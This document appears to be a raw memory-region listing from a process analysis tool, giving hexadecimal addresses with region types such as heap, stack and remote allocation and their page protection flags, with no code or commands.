page read and write
1404A2000
unkown
page execute and write copy
28401000
heap
page read and write
6297000
heap
page read and write
13D6A439000
heap
page read and write
2E31000
heap
page read and write
1170000
heap
page read and write
5FE2000
heap
page read and write
5E86000
heap
page read and write
627E000
heap
page read and write
1404B4000
unkown
page execute and write copy
65B2000
heap
page read and write
1956000
heap
page read and write
6104000
heap
page read and write
6643000
heap
page read and write
46A7000
heap
page read and write
18D0000
heap
page read and write
140502000
unkown
page execute and write copy
2105000
heap
page read and write
1367000
heap
page read and write
6510000
trusted library allocation
page read and write
60F8000
heap
page read and write
46E7000
heap
page read and write
6F2C000
stack
page read and write
6104000
heap
page read and write
1569000
unkown
page readonly
1135000
unkown
page execute and read and write
2D8D000
trusted library allocation
page read and write
61CA000
heap
page read and write
E02000
trusted library allocation
page read and write
DF0000
trusted library allocation
page read and write
61B4000
heap
page read and write
2A30000
heap
page read and write
6617000
heap
page read and write
3A9000
unkown
page write copy
2ECC000
trusted library allocation
page read and write
61EA000
heap
page read and write
2AFFB06F000
heap
page read and write
1404AC000
unkown
page execute and write copy
36FD000
stack
page read and write
618D000
heap
page read and write
51D5000
heap
page read and write
2AFFB315000
heap
page read and write
135F000
heap
page read and write
628C000
heap
page read and write
741000
unkown
page execute and read and write
422000
unkown
page write copy
50EE000
heap
page read and write
61D0000
trusted library allocation
page read and write
46B2000
heap
page read and write
106E000
heap
page read and write
2E4D9000
heap
page read and write
6320000
heap
page read and write
708E000
stack
page read and write
80000
unkown
page readonly
5E65000
heap
page read and write
13D6A43B000
heap
page read and write
1F0000
heap
page read and write
628C000
heap
page read and write
39F000
unkown
page readonly
5151000
trusted library allocation
page read and write
63BB000
heap
page read and write
2AFFB05A000
heap
page read and write
427000
unkown
page readonly
7FF8490AD000
trusted library allocation
page read and write
6119000
heap
page read and write
504F000
stack
page read and write
3430000
heap
page read and write
464E000
heap
page read and write
1120000
direct allocation
page read and write
65DB000
heap
page read and write
1402A4000
unkown
page execute and write copy
13D6A43B000
unkown
page read and write
61C1000
heap
page read and write
2E31000
heap
page read and write
5E86000
heap
page read and write
6151000
heap
page read and write
6285000
heap
page read and write
46A0000
heap
page read and write
53F000
heap
page read and write
311D000
stack
page read and write
6181000
heap
page read and write
7840000
heap
page read and write
6124000
heap
page read and write
32B1000
heap
page read and write
1340000
heap
page read and write
10D2000
unkown
page write copy
401000
unkown
page execute read
5113000
heap
page read and write
2B8B000
heap
page read and write
20202000000
heap
page read and write
2EEB000
trusted library allocation
page read and write
2233E000
heap
page read and write
1217000
trusted library allocation
page read and write
1C02E000
stack
page read and write
6180000
heap
page read and write
33AE000
stack
page read and write
65BA000
heap
page read and write
671F000
heap
page read and write
4659000
heap
page read and write
46C7000
heap
page read and write
6104000
heap
page read and write
7FF84911B000
trusted library allocation
page read and write
464E000
heap
page read and write
4680000
heap
page read and write
3671000
heap
page read and write
1BD8E000
stack
page read and write
61F5000
heap
page read and write
2D59000
trusted library allocation
page read and write
408000
unkown
page readonly
607E000
stack
page read and write
60F2000
heap
page read and write
513E000
trusted library allocation
page read and write
5E2E000
stack
page read and write
478F000
heap
page read and write
2BA2000
heap
page read and write
14037A000
unkown
page execute and write copy
6128000
heap
page read and write
6510000
trusted library allocation
page read and write
5850000
trusted library allocation
page execute and read and write
550000
heap
page read and write
5103000
heap
page read and write
6528000
heap
page read and write
6650000
heap
page read and write
32B1000
heap
page read and write
636000
unkown
page execute and read and write
F90000
trusted library allocation
page read and write
C26E000
stack
page read and write
6294000
heap
page read and write
13C000
unkown
page readonly
1211000
heap
page read and write
4680000
heap
page read and write
7FF848FB6000
trusted library allocation
page execute and read and write
2E4B000
trusted library allocation
page read and write
E70000
unkown
page readonly
6138000
heap
page read and write
61D1000
heap
page read and write
6104000
heap
page read and write
840000
unkown
page execute and read and write
6274000
heap
page read and write
61C9000
heap
page read and write
4745000
heap
page read and write
61C9000
heap
page read and write
5E88000
heap
page read and write
61B4000
heap
page read and write
5E88000
heap
page read and write
2B65000
heap
page read and write
4680000
heap
page read and write
1EC1000
heap
page read and write
20202013000
heap
page read and write
4680000
heap
page read and write
628B000
heap
page read and write
14053A000
unkown
page execute and write copy
2AF8014A000
trusted library allocation
page read and write
12CA000
heap
page read and write
478C000
heap
page read and write
32B1000
heap
page read and write
32AE000
stack
page read and write
1674000
heap
page read and write
3640000
remote allocation
page read and write
5EBB000
heap
page read and write
464F000
heap
page read and write
529C000
heap
page read and write
6284000
heap
page read and write
56E000
heap
page read and write
5E86000
heap
page read and write
2DF1000
trusted library allocation
page read and write
2DBB000
trusted library allocation
page read and write
1750000
heap
page read and write
550000
heap
page read and write
7FF8490F5000
trusted library allocation
page read and write
6208000
heap
page read and write
3671000
heap
page read and write
4660000
heap
page read and write
385E000
stack
page read and write
9E9000
stack
page read and write
2742000
heap
page read and write
1234000
heap
page read and write
6591000
heap
page read and write
7636000
heap
page read and write
61DE000
heap
page read and write
3671000
heap
page read and write
61D5000
heap
page read and write
664B000
heap
page read and write
7FF849200000
trusted library allocation
page read and write
1404A8000
unkown
page execute and write copy
582F000
stack
page read and write
51E0000
heap
page execute and read and write
2F61000
trusted library allocation
page read and write
1290000
direct allocation
page read and write
5E72000
heap
page read and write
176D000
heap
page read and write
2236C000
heap
page read and write
1B2D000
heap
page read and write
1404AC000
unkown
page execute and write copy
62B8000
heap
page read and write
60F5000
heap
page read and write
140500000
unkown
page execute and write copy
461D000
heap
page read and write
7A1000
unkown
page execute and read and write
2234C000
heap
page read and write
517F000
heap
page read and write
6553000
heap
page read and write
60F5000
heap
page read and write
75A000
unkown
page execute and read and write
8C0000
heap
page read and write
B8D627C000
stack
page read and write
3671000
heap
page read and write
13BA000
heap
page read and write
EE3000
trusted library allocation
page read and write
7FF84924B000
trusted library allocation
page read and write
6511000
heap
page read and write
663B000
heap
page read and write
1367000
heap
page read and write
2B8B000
heap
page read and write
7FF849300000
trusted library allocation
page read and write
2B65000
heap
page read and write
26A2E613000
heap
page read and write
61D8000
heap
page read and write
2B5C000
heap
page read and write
401000
unkown
page execute read
2D3F000
trusted library allocation
page read and write
61D0000
trusted library allocation
page read and write
FA0000
heap
page read and write
15A0000
heap
page read and write
5E97000
heap
page read and write
1074000
unkown
page execute and read and write
1290000
direct allocation
page read and write
C9E000
unkown
page execute and read and write
1027000
unkown
page execute and read and write
2AF8014E000
trusted library allocation
page read and write
65BB000
heap
page read and write
2234B000
heap
page read and write
2B9C000
heap
page read and write
3FE000
unkown
page execute and read and write
E4A000
unkown
page readonly
1367000
heap
page read and write
427000
unkown
page readonly
66BB000
heap
page read and write
283C0000
heap
page read and write
500000
heap
page read and write
51BB000
heap
page read and write
E85EC7E000
stack
page read and write
FB4000
heap
page read and write
1404FE000
unkown
page execute and write copy
2E31000
heap
page read and write
5DC000
unkown
page execute and read and write
6535000
heap
page read and write
54CE000
heap
page read and write
FB0000
heap
page read and write
E77000
unkown
page readonly
F07000
trusted library allocation
page execute and read and write
22336000
heap
page read and write
4791000
heap
page read and write
2235E000
heap
page read and write
52E7000
heap
page read and write
190000
heap
page read and write
36EF000
stack
page read and write
65D1000
heap
page read and write
4787000
heap
page read and write
2DA0000
direct allocation
page read and write
1A45000
heap
page execute and read and write
651B000
heap
page read and write
1E6A000
heap
page read and write
112B000
heap
page read and write
105E000
unkown
page execute and read and write
513E000
heap
page read and write
1680000
direct allocation
page read and write
60D7000
heap
page read and write
2AF803F6000
trusted library allocation
page read and write
2080000
heap
page read and write
6511000
heap
page read and write
61B4000
heap
page read and write
7FF849115000
trusted library allocation
page read and write
13BA000
heap
page read and write
1BF0000
heap
page read and write
2DC1000
trusted library allocation
page read and write
60F0000
heap
page read and write
EDD000
trusted library allocation
page execute and read and write
32B1000
heap
page read and write
5E53000
heap
page read and write
5162000
trusted library allocation
page read and write
612B000
heap
page read and write
4680000
heap
page read and write
400000
unkown
page readonly
6798000
heap
page read and write
66BB000
heap
page read and write
20F0000
heap
page read and write
120D000
stack
page read and write
6139000
heap
page read and write
1240000
heap
page read and write
664A000
heap
page read and write
54C000
heap
page read and write
2F7A000
trusted library allocation
page read and write
5BAF000
stack
page read and write
2AFFD2C8000
heap
page read and write
7FF880030000
direct allocation
page execute and read and write
6283000
heap
page read and write
4772000
heap
page read and write
515F000
heap
page read and write
6458000
heap
page read and write
3671000
heap
page read and write
4642000
heap
page read and write
400000
unkown
page readonly
51D0000
heap
page read and write
2234F000
heap
page read and write
B8D67FE000
stack
page read and write
2F18000
trusted library allocation
page read and write
561000
heap
page read and write
46D000
heap
page read and write
5EEC000
heap
page read and write
502000
heap
page read and write
32B1000
heap
page read and write
1590000
unkown
page write copy
32B1000
heap
page read and write
FC0000
heap
page read and write
2AF8018A000
trusted library allocation
page read and write
6590000
trusted library allocation
page read and write
8FB000
stack
page read and write
6126000
heap
page read and write
5B73000
heap
page read and write
652D000
heap
page read and write
583F000
stack
page read and write
6104000
heap
page read and write
4680000
heap
page read and write
D50000
heap
page read and write
337E000
stack
page read and write
422000
unkown
page write copy
2F06000
trusted library allocation
page read and write
62FE000
heap
page read and write
4675000
heap
page read and write
EFA000
trusted library allocation
page execute and read and write
2E31000
heap
page read and write
54CC000
heap
page read and write
13AE000
heap
page read and write
6322000
heap
page read and write
2B83000
heap
page read and write
2B99000
heap
page read and write
60F2000
heap
page read and write
2B1000
unkown
page execute read
E85E07E000
stack
page read and write
2D5D000
trusted library allocation
page read and write
E15000
heap
page read and write
65C7000
heap
page read and write
4652000
heap
page read and write
6180000
heap
page read and write
6523000
heap
page read and write
7860000
heap
page read and write
1062000
heap
page read and write
65B1000
heap
page read and write
6119000
heap
page read and write
4740000
direct allocation
page read and write
3671000
heap
page read and write
2D51000
trusted library allocation
page read and write
6799000
heap
page read and write
4634000
heap
page read and write
60BF000
stack
page read and write
6590000
heap
page read and write
46FA000
heap
page read and write
554000
heap
page read and write
561000
heap
page read and write
437000
unkown
page read and write
132A000
heap
page read and write
47AB000
heap
page read and write
18A0000
direct allocation
page read and write
618D000
heap
page read and write
1F0000
direct allocation
page read and write
2F04000
trusted library allocation
page read and write
2AF801D8000
trusted library allocation
page read and write
2B54000
heap
page read and write
610A000
heap
page read and write
FCE000
heap
page read and write
61C1000
heap
page read and write
14B0000
heap
page read and write
140508000
unkown
page execute and write copy
6A3000
heap
page read and write
61D0000
trusted library allocation
page read and write
460C000
stack
page read and write
50C1000
heap
page read and write
2234B000
heap
page read and write
6130000
heap
page read and write
7FF849170000
trusted library allocation
page read and write
1066000
heap
page read and write
1404FE000
unkown
page execute and write copy
F0B000
trusted library allocation
page execute and read and write
614A000
heap
page read and write
22336000
heap
page read and write
550000
heap
page read and write
61F8000
heap
page read and write
623B000
heap
page read and write
51BB000
heap
page read and write
5E61000
heap
page read and write
2B69000
heap
page read and write
5F51000
heap
page read and write
463C000
heap
page read and write
140508000
unkown
page execute and write copy
46B2000
heap
page read and write
401000
unkown
page execute read
5E7D000
heap
page read and write
1C15000
heap
page read and write
651D000
heap
page read and write
61AD000
heap
page read and write
2E31000
heap
page read and write
65D2000
heap
page read and write
62B8000
heap
page read and write
494000
heap
page read and write
61B4000
heap
page read and write
22365000
heap
page read and write
1077000
heap
page read and write
1E75000
heap
page read and write
1674000
heap
page read and write
55D9000
heap
page read and write
6129000
heap
page read and write
46E7000
heap
page read and write
1F0000
direct allocation
page read and write
DF6000
trusted library allocation
page execute and read and write
6132000
heap
page read and write
6197000
heap
page read and write
4675000
heap
page read and write
6124000
heap
page read and write
173A000
heap
page read and write
7FF849310000
trusted library allocation
page read and write
545000
unkown
page readonly
1403E3000
unkown
page execute and write copy
6BA000
heap
page read and write
60F2000
heap
page read and write
517D000
heap
page read and write
1048000
heap
page read and write
46B7000
heap
page read and write
7FF84912B000
trusted library allocation
page read and write
2D7000
unkown
page write copy
A4A000
unkown
page execute read
61F6000
heap
page read and write
1D5F000
stack
page read and write
5103000
heap
page read and write
6192000
heap
page read and write
2E40000
heap
page read and write
CF1000
unkown
page execute read
61F4000
heap
page read and write
5190000
trusted library allocation
page execute and read and write
6131000
heap
page read and write
6200000
heap
page read and write
45D5000
heap
page read and write
18A9000
direct allocation
page read and write
61F0000
heap
page read and write
63D4000
heap
page read and write
1A30000
heap
page read and write
F90000
heap
page execute and read and write
24C0000
trusted library allocation
page read and write
2B72000
heap
page read and write
448000
unkown
page execute and read and write
651F000
heap
page read and write
20201FA0000
heap
page read and write
400000
unkown
page readonly
2B96000
trusted library allocation
page read and write
9B000
stack
page read and write
5E7D000
heap
page read and write
2F98000
trusted library allocation
page read and write
1211000
heap
page read and write
2F35000
trusted library allocation
page read and write
6328000
heap
page read and write
19FD000
unkown
page read and write
627E000
heap
page read and write
45E0000
direct allocation
page read and write
2DC7000
trusted library allocation
page read and write
32B1000
heap
page read and write
63E1000
heap
page read and write
5E0C000
heap
page read and write
6281000
heap
page read and write
61B4000
heap
page read and write
371E000
stack
page read and write
51BB000
heap
page read and write
57E000
unkown
page execute and read and write
4634000
heap
page read and write
435000
remote allocation
page execute and read and write
E07000
trusted library allocation
page execute and read and write
1650000
direct allocation
page read and write
2F4A000
trusted library allocation
page read and write
618D000
heap
page read and write
3671000
heap
page read and write
464E000
heap
page read and write
65B4000
heap
page read and write
14050A000
unkown
page execute and write copy
2E68000
trusted library allocation
page read and write
14049A000
unkown
page execute and write copy
46A7000
heap
page read and write
2E4D000
trusted library allocation
page read and write
623C000
heap
page read and write
16135000
heap
page read and write
567D000
heap
page read and write
7FF848EE6000
trusted library allocation
page execute and read and write
2746000
heap
page read and write
679C4000
unkown
page readonly
366F000
stack
page read and write
2E31000
heap
page read and write
5E72000
heap
page read and write
61E7000
heap
page read and write
2B47000
heap
page read and write
22344000
heap
page read and write
2AFFAE70000
heap
page read and write
561000
heap
page read and write
E0000
unkown
page readonly
3671000
heap
page read and write
6209000
heap
page read and write
5ED6000
heap
page read and write
5F2D000
stack
page read and write
ED3000
trusted library allocation
page execute and read and write
2DC9000
trusted library allocation
page read and write
65BB000
heap
page read and write
61B4000
heap
page read and write
51BB000
heap
page read and write
5E86000
heap
page read and write
2BA0000
heap
page read and write
5F4B000
heap
page read and write
618A000
heap
page read and write
4689000
heap
page read and write
2DE4000
trusted library allocation
page read and write
140504000
unkown
page execute and write copy
5E61000
heap
page read and write
2F54000
trusted library allocation
page read and write
5EC7000
heap
page read and write
20D000
stack
page read and write
4F4E000
stack
page read and write
1E73000
heap
page read and write
E1000
unkown
page execute read
1350000
heap
page read and write
46B2000
heap
page read and write
61B4000
heap
page read and write
2E31000
heap
page read and write
61C9000
heap
page read and write
185DCA13000
heap
page read and write
1B94F000
stack
page read and write
5290000
heap
page read and write
61C1000
heap
page read and write
6711000
heap
page read and write
462B000
heap
page read and write
5E55000
heap
page read and write
1BFF6000
direct allocation
page execute read
28428000
heap
page read and write
B8D63FE000
unkown
page readonly
664C000
heap
page read and write
4680000
heap
page read and write
B8D69FE000
stack
page read and write
4656000
heap
page read and write
612C000
heap
page read and write
54C000
heap
page read and write
61D9000
heap
page read and write
5E63000
heap
page read and write
1120000
direct allocation
page read and write
60F7000
heap
page read and write
66BB000
heap
page read and write
2B99000
heap
page read and write
7FF849072000
trusted library allocation
page read and write
6134000
heap
page read and write
6ABA000
heap
page read and write
2DF9000
trusted library allocation
page read and write
2D76000
trusted library allocation
page read and write
158F000
unkown
page execute and write copy
2B7F000
heap
page read and write
2DC3000
trusted library allocation
page read and write
618D000
heap
page read and write
463F000
heap
page read and write
6FF000
stack
page read and write
1720000
heap
page read and write
684000
unkown
page execute and read and write
7FF848EBC000
trusted library allocation
page execute and read and write
1404A0000
unkown
page execute and write copy
3430000
heap
page read and write
4656000
heap
page read and write
5BAE000
stack
page read and write
61C9000
heap
page read and write
1650000
direct allocation
page read and write
1402A2000
unkown
page read and write
DC0000
trusted library allocation
page read and write
5229000
heap
page read and write
549000
unkown
page execute and read and write
2B43000
heap
page read and write
4625000
heap
page read and write
5810000
trusted library allocation
page read and write
381000
unkown
page execute read
22353000
heap
page read and write
2B7F000
heap
page read and write
6131000
heap
page read and write
7FF848FB2000
trusted library allocation
page read and write
554000
heap
page read and write
18B0000
direct allocation
page read and write
651E000
heap
page read and write
54C000
heap
page read and write
6591000
heap
page read and write
6511000
heap
page read and write
411000
unkown
page readonly
65BC000
heap
page read and write
66BB000
heap
page read and write
2AFFB03C000
heap
page read and write
61D0000
trusted library allocation
page read and write
51B0000
heap
page read and write
6135000
heap
page read and write
EF2000
trusted library allocation
page read and write
14049E000
unkown
page execute and write copy
630D000
heap
page read and write
106A000
unkown
page execute and read and write
52E3000
heap
page read and write
3640000
remote allocation
page read and write
2E31000
heap
page read and write
61D8000
heap
page read and write
46E7000
heap
page read and write
E85DC7F000
stack
page read and write
347C000
heap
page read and write
185DCA00000
heap
page read and write
5FEB000
heap
page read and write
528D000
heap
page read and write
5E61000
heap
page read and write
64FC000
heap
page read and write
61E7000
heap
page read and write
550000
heap
page read and write
1ED4000
heap
page read and write
4689000
heap
page read and write
4785000
heap
page read and write
2EA7000
trusted library allocation
page read and write
2EE9000
trusted library allocation
page read and write
63D4000
heap
page read and write
679EE000
unkown
page readonly
651D000
heap
page read and write
F02000
trusted library allocation
page read and write
62B8000
heap
page read and write
5E7C000
heap
page read and write
6181000
heap
page read and write
194F000
heap
page read and write
15E24000
heap
page read and write
61D8000
heap
page read and write
1650000
direct allocation
page read and write
2EE5000
trusted library allocation
page read and write
E90000
unkown
page write copy
1015000
unkown
page execute and read and write
32B1000
heap
page read and write
2DBD000
trusted library allocation
page read and write
1367000
heap
page read and write
60F8000
heap
page read and write
4787000
heap
page read and write
61FB000
heap
page read and write
12A0000
heap
page read and write
2746000
heap
page read and write
6327000
heap
page read and write
1727000
heap
page read and write
3671000
heap
page read and write
1404B2000
unkown
page execute and write copy
5A2E000
stack
page read and write
32B1000
heap
page read and write
61CA000
heap
page read and write
5EA0000
heap
page read and write
65BC000
heap
page read and write
2E31000
heap
page read and write
6529000
heap
page read and write
EFC000
stack
page read and write
550000
heap
page read and write
2B95000
heap
page read and write
22344000
heap
page read and write
3671000
heap
page read and write
FF000
unkown
page readonly
1E6A000
heap
page read and write
140277000
unkown
page execute and write copy
3671000
heap
page read and write
4651000
heap
page read and write
4659000
heap
page read and write
7FF848E12000
trusted library allocation
page read and write
3970000
heap
page read and write
19F7000
unkown
page read and write
63E0000
heap
page read and write
6134000
heap
page read and write
18B0000
direct allocation
page read and write
2B3E000
heap
page read and write
2B8E000
heap
page read and write
22345000
heap
page read and write
6511000
heap
page read and write
1290000
direct allocation
page read and write
1F91000
direct allocation
page read and write
6104000
heap
page read and write
46C7000
heap
page read and write
135B000
heap
page read and write
12A7000
heap
page read and write
1070000
unkown
page execute and read and write
61E1000
heap
page read and write
1404FE000
unkown
page execute and write copy
2B65000
trusted library allocation
page read and write
2DA0000
direct allocation
page read and write
65D1000
heap
page read and write
355CE000
heap
page read and write
1404B0000
unkown
page execute and write copy
38F9000
heap
page read and write
E85D87D000
stack
page read and write
2DAA000
trusted library allocation
page read and write
E80000
unkown
page readonly
3671000
heap
page read and write
2B52000
heap
page read and write
679EC000
unkown
page read and write
1404A8000
unkown
page execute and write copy
2AFFAF90000
heap
page read and write
22341000
heap
page read and write
22343000
heap
page read and write
4689000
heap
page read and write
2012000
direct allocation
page read and write
2B54000
heap
page read and write
106C000
unkown
page execute and read and write
185DCA2B000
heap
page read and write
5286000
heap
page read and write
7FF8490C0000
trusted library allocation
page read and write
19C1000
heap
page read and write
4689000
heap
page read and write
6536000
heap
page read and write
56E000
heap
page read and write
4689000
heap
page read and write
61E4000
heap
page read and write
2E31000
heap
page read and write
513E000
heap
page read and write
2B43000
heap
page read and write
61D1000
heap
page read and write
6DBB000
heap
page read and write
6D1000
heap
page read and write
7FF8490F0000
trusted library allocation
page read and write
5E7D000
heap
page read and write
2E31000
heap
page read and write
260000
heap
page read and write
561000
heap
page read and write
5112000
heap
page read and write
185DCA02000
heap
page read and write
78C000
unkown
page execute and read and write
7892000
heap
page read and write
7A5A000
stack
page read and write
5600000
heap
page read and write
13D6A713000
heap
page read and write
6E50000
heap
page read and write
2DA0000
direct allocation
page read and write
40A000
unkown
page write copy
2B54000
heap
page read and write
5CAF000
stack
page read and write
6511000
heap
page read and write
465C000
heap
page read and write
462B000
heap
page read and write
2B9C000
heap
page read and write
10BB000
unkown
page execute read
6295000
heap
page read and write
6274000
heap
page read and write
26A2EC60000
remote allocation
page read and write
15F29000
heap
page read and write
620A000
heap
page read and write
1776000
heap
page read and write
6132000
heap
page read and write
2F63000
trusted library allocation
page read and write
509000
heap
page read and write
4787000
heap
page read and write
528000
heap
page read and write
26A2E5C0000
heap
page read and write
61D8000
heap
page read and write
1BE98000
direct allocation
page execute read
F40000
heap
page read and write
43B000
unkown
page execute read
60F8000
heap
page read and write
6D9000
heap
page read and write
62B9000
heap
page read and write
C60000
heap
page read and write
65DB000
heap
page read and write
54C000
heap
page read and write
22339000
heap
page read and write
587E000
stack
page read and write
1760000
heap
page read and write
1740000
heap
page read and write
2B88000
heap
page read and write
628F000
heap
page read and write
3671000
heap
page read and write
65BB000
heap
page read and write
6534000
heap
page read and write
6467000
heap
page read and write
61E7000
heap
page read and write
479B000
heap
page read and write
EF6000
trusted library allocation
page execute and read and write
61FC000
heap
page read and write
EF3000
stack
page read and write
2F31000
trusted library allocation
page read and write
6180000
heap
page read and write
1670000
heap
page read and write
E8FF000
stack
page read and write
FF0000
heap
page read and write
6310000
heap
page read and write
63AE000
heap
page read and write
F60000
heap
page read and write
323000
unkown
page execute and read and write
140548000
unkown
page execute and write copy
13D6A439000
unkown
page read and write
762E000
stack
page read and write
1136000
unkown
page write copy
17B7000
heap
page read and write
465E000
heap
page read and write
2DC0000
trusted library allocation
page read and write
61EA000
heap
page read and write
14050E000
unkown
page execute and write copy
6192000
heap
page read and write
32B1000
heap
page read and write
620A000
heap
page read and write
2234A000
heap
page read and write
618A000
heap
page read and write
1234000
heap
page read and write
32B1000
heap
page read and write
32B1000
heap
page read and write
46C7000
heap
page read and write
1A0000
heap
page read and write
E82000
unkown
page readonly
2F2B000
trusted library allocation
page read and write
13BA000
heap
page read and write
1351000
heap
page read and write
7FF848E10000
trusted library allocation
page read and write
510B000
heap
page read and write
62A2000
heap
page read and write
2E31000
heap
page read and write
5E88000
heap
page read and write
6119000
heap
page read and write
63DE000
heap
page read and write
1650000
heap
page read and write
FE7000
heap
page read and write
4BCD000
stack
page read and write
2E31000
heap
page read and write
60F5000
heap
page read and write
614B000
heap
page read and write
554000
heap
page read and write
477D000
heap
page read and write
59E000
unkown
page execute and read and write
561000
heap
page read and write
6E3000
unkown
page execute and read and write
6307000
heap
page read and write
6104000
heap
page read and write
6528000
heap
page read and write
420000
unkown
page read and write
4784000
heap
page read and write
5E53000
heap
page read and write
1498000
heap
page read and write
60F7000
heap
page read and write
1066000
unkown
page execute and read and write
1290000
direct allocation
page read and write
462B000
heap
page read and write
5FD7000
heap
page read and write
71CF000
stack
page read and write
3851000
trusted library allocation
page read and write
15EA2000
heap
page read and write
590000
heap
page read and write
6131000
heap
page read and write
51BB000
heap
page read and write
16ED000
stack
page read and write
3671000
heap
page read and write
54CA000
heap
page read and write
1B4A000
heap
page read and write
1C7000
heap
page read and write
6283000
heap
page read and write
1495000
heap
page read and write
5E7C000
heap
page read and write
618D000
heap
page read and write
2E31000
heap
page read and write
6C6B000
heap
page read and write
6131000
heap
page read and write
13FD000
heap
page read and write
148C000
heap
page read and write
1680000
trusted library allocation
page read and write
2B65000
heap
page read and write
5E6A000
heap
page read and write
5239000
heap
page read and write
1BE91000
direct allocation
page execute read
6510000
trusted library allocation
page read and write
2B80000
heap
page read and write
2235A000
heap
page read and write
1051000
heap
page read and write
6119000
heap
page read and write
1301000
heap
page read and write
2C49000
trusted library allocation
page read and write
6281000
heap
page read and write
2D92000
trusted library allocation
page read and write
461D000
heap
page read and write
6254000
heap
page read and write
6590000
trusted library allocation
page read and write
6B0000
heap
page read and write
5F68000
heap
page read and write
2B86000
heap
page read and write
7FF4588C0000
trusted library allocation
page execute and read and write
385C000
trusted library allocation
page read and write
10EAC000
stack
page read and write
2F16000
trusted library allocation
page read and write
6511000
heap
page read and write
2E31000
heap
page read and write
223DC000
heap
page read and write
474D000
heap
page read and write
431000
remote allocation
page execute and read and write
1402A4000
unkown
page execute and write copy
456000
remote allocation
page execute and read and write
140277000
unkown
page execute and read and write
71F000
unkown
page execute and read and write
6591000
heap
page read and write
3671000
heap
page read and write
5A80000
trusted library allocation
page execute and read and write
61C1000
heap
page read and write
62FD000
heap
page read and write
32A7000
heap
page read and write
14053A000
unkown
page execute and write copy
5EBA000
heap
page read and write
13BA000
heap
page read and write
62B8000
heap
page read and write
5E7D000
heap
page read and write
6131000
heap
page read and write
477F000
heap
page read and write
1E8E000
heap
page read and write
1120000
direct allocation
page read and write
2B7D000
heap
page read and write
3671000
heap
page read and write
32B1000
heap
page read and write
2AFFB2C0000
direct allocation
page execute and read and write
60F5000
heap
page read and write
3671000
heap
page read and write
283C6000
heap
page read and write
158F000
unkown
page execute and read and write
2D5B000
trusted library allocation
page read and write
38AE000
stack
page read and write
1404B4000
unkown
page execute and write copy
4A9000
unkown
page readonly
62A3000
heap
page read and write
1403D3000
unkown
page execute and read and write
2F33000
trusted library allocation
page read and write
2B65000
heap
page read and write
7FF84912F000
trusted library allocation
page read and write
FA0000
trusted library allocation
page read and write
26A2E5F0000
trusted library allocation
page read and write
655C000
heap
page read and write
5550000
trusted library section
page readonly
2B69000
heap
page read and write
22341000
heap
page read and write
46AE000
heap
page read and write
4625000
heap
page read and write
46AE000
heap
page read and write
65B2000
heap
page read and write
2160000
heap
page read and write
6510000
trusted library allocation
page read and write
13BD000
heap
page read and write
70CE000
stack
page read and write
2AF80195000
trusted library allocation
page read and write
5200000
trusted library allocation
page execute and read and write
3A9000
unkown
page read and write
46C1000
heap
page read and write
4772000
heap
page read and write
61E3000
heap
page read and write
2E31000
heap
page read and write
60A9000
heap
page read and write
6124000
heap
page read and write
1B94000
heap
page read and write
5AD4000
heap
page read and write
13B0000
heap
page read and write
466E000
heap
page read and write
61CA000
heap
page read and write
2DA0000
direct allocation
page read and write
5FF3000
heap
page read and write
54C000
heap
page read and write
2E9A000
trusted library allocation
page read and write
CF0000
unkown
page readonly
62B8000
heap
page read and write
49B000
unkown
page write copy
11B4000
heap
page read and write
1F84000
direct allocation
page read and write
462B000
heap
page read and write
618A000
heap
page read and write
50C1000
heap
page read and write
1067000
heap
page read and write
5170000
heap
page read and write
5AAE000
stack
page read and write
12F3000
heap
page read and write
115D000
heap
page read and write
63AA000
heap
page read and write
2F50000
trusted library allocation
page read and write
18A0000
direct allocation
page read and write
7FF848EC0000
trusted library allocation
page execute and read and write
6135000
heap
page read and write
31A000
unkown
page read and write
5E7D000
heap
page read and write
6511000
heap
page read and write
2B1000
unkown
page execute read
2AFFB010000
trusted library allocation
page read and write
2B65000
heap
page read and write
6118000
heap
page read and write
20202034000
heap
page read and write
2B93000
heap
page read and write
140000000
unkown
page readonly
F20000
trusted library allocation
page read and write
51F0000
heap
page read and write
22353000
heap
page read and write
1404A4000
unkown
page execute and write copy
61E5000
heap
page read and write
26A2EE02000
trusted library allocation
page read and write
185DCA40000
heap
page read and write
BEF000
stack
page read and write
459000
remote allocation
page execute and read and write
606000
remote allocation
page execute and read and write
84E000
stack
page read and write
5F40000
heap
page read and write
32B1000
heap
page read and write
2BD5000
trusted library allocation
page read and write
65C3000
heap
page read and write
D40000
heap
page read and write
517D000
heap
page read and write
18DA000
heap
page read and write
62FD000
heap
page read and write
2B99000
heap
page read and write
6274000
heap
page read and write
67B0000
heap
page read and write
5562000
heap
page read and write
65C5000
heap
page read and write
479B000
heap
page read and write
1914000
heap
page read and write
2D57000
trusted library allocation
page read and write
42F000
unkown
page write copy
618A000
heap
page read and write
1290000
direct allocation
page read and write
61C1000
heap
page read and write
61CA000
heap
page read and write
6104000
heap
page read and write
133C000
heap
page read and write
2235C000
heap
page read and write
3410000
remote allocation
page read and write
5E8C000
heap
page read and write
140001000
unkown
page execute and write copy
61CA000
heap
page read and write
2E9C000
trusted library allocation
page read and write
1650000
direct allocation
page read and write
1072000
unkown
page execute and read and write
2AFFB071000
heap
page read and write
7FF84908D000
trusted library allocation
page read and write
16F000
stack
page read and write
1BF7000
heap
page read and write
46AE000
heap
page read and write
628B000
heap
page read and write
6283000
heap
page read and write
4656000
heap
page read and write
32B1000
heap
page read and write
6152000
heap
page read and write
2B51000
heap
page read and write
5FF5000
heap
page read and write
E0000
unkown
page readonly
1650000
direct allocation
page read and write
ADF000
stack
page read and write
1C181000
heap
page read and write
6ED0000
heap
page read and write
101C000
heap
page read and write
65BB000
heap
page read and write
2E4F000
trusted library allocation
page read and write
60F5000
heap
page read and write
63D1000
heap
page read and write
2AFFB020000
trusted library allocation
page read and write
1711000
heap
page read and write
6303000
heap
page read and write
620A000
heap
page read and write
1650000
direct allocation
page read and write
D9E000
stack
page read and write
5EAF000
heap
page read and write
3671000
heap
page read and write
5C59000
heap
page read and write
20201F80000
heap
page read and write
6281000
heap
page read and write
2B92000
heap
page read and write
51C000
heap
page read and write
61E3000
heap
page read and write
554000
heap
page read and write
1BD2E000
stack
page read and write
7FF848FA0000
trusted library allocation
page read and write
2E30000
heap
page read and write
2B54000
heap
page read and write
7FF4588A0000
trusted library allocation
page execute and read and write
7FF8490B4000
trusted library allocation
page read and write
56FF000
stack
page read and write
2048000
direct allocation
page read and write
2B9C000
heap
page read and write
63D0000
heap
page read and write
1F0000
heap
page read and write
2B54000
heap
page read and write
468A000
heap
page read and write
2AFFAFD0000
heap
page read and write
7FF849180000
trusted library allocation
page read and write
14049A000
unkown
